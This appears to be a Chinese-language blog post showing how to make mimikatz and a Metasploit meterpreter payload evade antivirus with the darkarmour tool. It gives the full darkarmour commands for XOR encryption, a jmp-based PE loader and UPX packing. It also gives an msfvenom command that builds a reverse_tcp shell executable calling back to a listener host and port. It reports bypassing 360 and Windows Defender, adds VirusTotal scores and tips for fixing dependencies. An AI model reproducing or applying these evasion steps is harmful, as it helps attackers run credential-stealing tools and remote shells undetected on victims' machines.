|
0x1 mimikatz免杀
python3 darkarmour.py -f /root/mimikatz.exe -e xor -j -k sanker -l 20 -u -o /root/bypass_mimikatz.exe
k参数:用于加密的密钥key,如果不设置则默认随机生成
j参数:使用基于jmp的PE加载器
l参数:加密级别
u参数:用upx打包可执行文件
这里加密字节的过程比较久,尝试运行bypass_mimikatz.exe
运行成功,看看免杀效果如何
Bypass 360 success!
Bypass Windows Defender success!
V站评分10/66
0x2 MSF免杀
先生成可执行文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.160.128 LPORT=4488 -f exe -o msf.exe
此次的加密等级设置为10
上线成功,看看免杀效果如何
Bypass 360 success!
Bypass Windows Defender success!
V站评分22/66(分数不太可观,可能和我设置的加密等级有关)
加密后的mimikatz.exe居然10.6MB。源文件才1.29MB,我猜测这应该是我设置的加密等级太高,图中可以看到我加密等级为500,项目给出的示例也仅仅是5而已。同时,我猜测加密等级会影响免杀效果,由于加密花费时间较长,我这里就没有一一进行测试
记录一些使用过程中遇到的问题:
排坑1:报错“sh: 1: x86_64-w64-mingw32-gcc: not foundded.exe...”
解决方法:
apt-get install mingw-w64
项目所需要的依赖环境:
apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode
注意:本人试过用Windows 10和Ubuntu系统去使用darkarmour工具,都混淆shellcode失败,原因未知。如果同样有小伙伴在使用这款工具时遇到这样的问题,不妨换成Kali系统。
排坑2:使用msfvenom生成MSF马时,必须用以下命令
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.160.128 LPORT=4488 -f exe -o msf.exe
注意:payload一定得是windows/x64/meterpreter/reverse_tcp
(别问为什么,我也不清楚,我一开始上线不成功,最后排查到居然是payload的问题,想不明白为什么,这里浪费好些时间图片)
源项目地址:
https://github.com/bats3c/darkarmour |